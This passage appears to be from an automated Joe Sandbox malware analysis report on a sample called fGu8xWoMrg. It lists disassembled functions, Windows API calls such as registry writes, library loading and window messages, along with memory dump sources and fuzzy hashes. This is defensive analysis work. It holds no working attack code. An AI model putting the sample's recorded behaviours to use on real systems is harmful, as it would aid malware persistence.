                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                                                                                                                                                                            • Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
                                                                                                                                                                            • Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                                                                                                                                                                            • Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55
                                                                                                                                                                            Function 00406A4F Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                                                                                                                                                                            • Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
                                                                                                                                                                            • Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                                                                                                                                                                            • Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45
                                                                                                                                                                            Function 00406E9D Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                                                                                                                                                                            • Instruction ID: 6da958b06032b63f13a44664be3ec753dd66a0d9f0ebc92e4dfa00afb32c2233
                                                                                                                                                                            • Opcode Fuzzy Hash: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                                                                                                                                                                            • Instruction Fuzzy Hash: 677123B1D04229CBDF24CFA8C8847ADBBF1FB44305F14816AE856B7281D7386A86DF45
                                                                                                                                                                            Function 00406FBB Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                                                                                                                                                                            • Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
                                                                                                                                                                            • Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                                                                                                                                                                            • Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45
                                                                                                                                                                            Function 00406F07 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                                                                                                                                                                            • Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
                                                                                                                                                                            • Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                                                                                                                                                                            • Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45
                                                                                                                                                                            Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                                                                                                              • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                              • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                              • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
                                                                                                                                                                              • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                                                                                                            • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 334405425-0
                                                                                                                                                                            • Opcode ID: 11c3cf00bd93389db0dc410ebbe218bf6d9da3e13992e2678f31c330316c266a
                                                                                                                                                                            • Instruction ID: 94cae06f4fc191ca30d479cf411a95ccd627b95a6d871bbe988cbf7c6203fea7
                                                                                                                                                                            • Opcode Fuzzy Hash: 11c3cf00bd93389db0dc410ebbe218bf6d9da3e13992e2678f31c330316c266a
                                                                                                                                                                            • Instruction Fuzzy Hash: 0D21F231904104FBCF11AFA5CF48A9E7A71BF48354F20013BF501B91E0DBBD8A92965D
                                                                                                                                                                            Function 0040248A Relevance: 4.6, APIs: 3, Instructions: 64registrystringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(0040B5C8,00000023,00000011,00000002), ref: 004024D5
                                                                                                                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,0040B5C8,00000000,00000011,00000002), ref: 00402515
                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseValuelstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2655323295-0
                                                                                                                                                                            • Opcode ID: 115faf02d334c89f827882088b0be8a93b9cbe5759b9d35681ab44e4bb566471
                                                                                                                                                                            • Instruction ID: 742bbefa47e989f243bf6062c522ac596cbc11b4bfeba2949f21d1d9b27b1258
                                                                                                                                                                            • Opcode Fuzzy Hash: 115faf02d334c89f827882088b0be8a93b9cbe5759b9d35681ab44e4bb566471
                                                                                                                                                                            • Instruction Fuzzy Hash: 8B11AC71E00108BEEB10AFA1DE49EAEBAB8FF44358F10403AF404B61C1D7B88D409A68
                                                                                                                                                                            Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                                                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Enum$CloseValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 397863658-0
                                                                                                                                                                            • Opcode ID: eb6c8e15ee44575ea420681c9cc2a7e67ba876646878e1eb00c8e7fc00d42c1f
                                                                                                                                                                            • Instruction ID: 8c40f98af4add78d59c4bc2bb7842a1dfdaddd4ec6c9bbdee1c196b88a33675a
                                                                                                                                                                            • Opcode Fuzzy Hash: eb6c8e15ee44575ea420681c9cc2a7e67ba876646878e1eb00c8e7fc00d42c1f
                                                                                                                                                                            • Instruction Fuzzy Hash: 61017CB1A04105BBEB159F94DE58AAFB66CEF40348F10403AF501B61D0EBB85E45966D
                                                                                                                                                                            Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3356406503-0
                                                                                                                                                                            • Opcode ID: 06d9a8ad9cd75b344e281f0f33afa87d54a5442f7653d28a97a29c4d8ae17323
                                                                                                                                                                            • Instruction ID: f1f7847c69b95e8b88bdf62be751073741875666d26e4aee14b76084b72d5d95
                                                                                                                                                                            • Opcode Fuzzy Hash: 06d9a8ad9cd75b344e281f0f33afa87d54a5442f7653d28a97a29c4d8ae17323
                                                                                                                                                                            • Instruction Fuzzy Hash: E2116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5E
                                                                                                                                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            • Opcode ID: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                                                                                                                                                                            • Instruction ID: 40daf909c284af41af5c9cdf7f458e0296b91398e9c9917f7ae767538e8fd086
                                                                                                                                                                            • Opcode Fuzzy Hash: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                                                                                                                                                                            • Instruction Fuzzy Hash: 1A01D131724220EBEB194B389D09B2A3698E710318F10867AF855F66F1E6788C129B5C
                                                                                                                                                                            Function 0040563C Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040564C
                                                                                                                                                                              • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                                                                                                                                                            • CoUninitialize.COMBASE(00000404,00000000,?,00000000,?), ref: 00405698
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2896919175-0
                                                                                                                                                                            • Opcode ID: a1e7d01539343cbedca50b7a5125379b8eaabd142d8c7e4c73993699b28e4919
                                                                                                                                                                            • Instruction ID: e8a19e3ae465cdfca2bef1253819f9a2a21047bc58a71dd1e8c92fd5a8ca6894
                                                                                                                                                                            • Opcode Fuzzy Hash: a1e7d01539343cbedca50b7a5125379b8eaabd142d8c7e4c73993699b28e4919
                                                                                                                                                                            • Instruction Fuzzy Hash: EFF0F0B2600600DBE3115754A901B677364EB80304F85497AEF88623E1CB3B0C128A2E
                                                                                                                                                                            Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
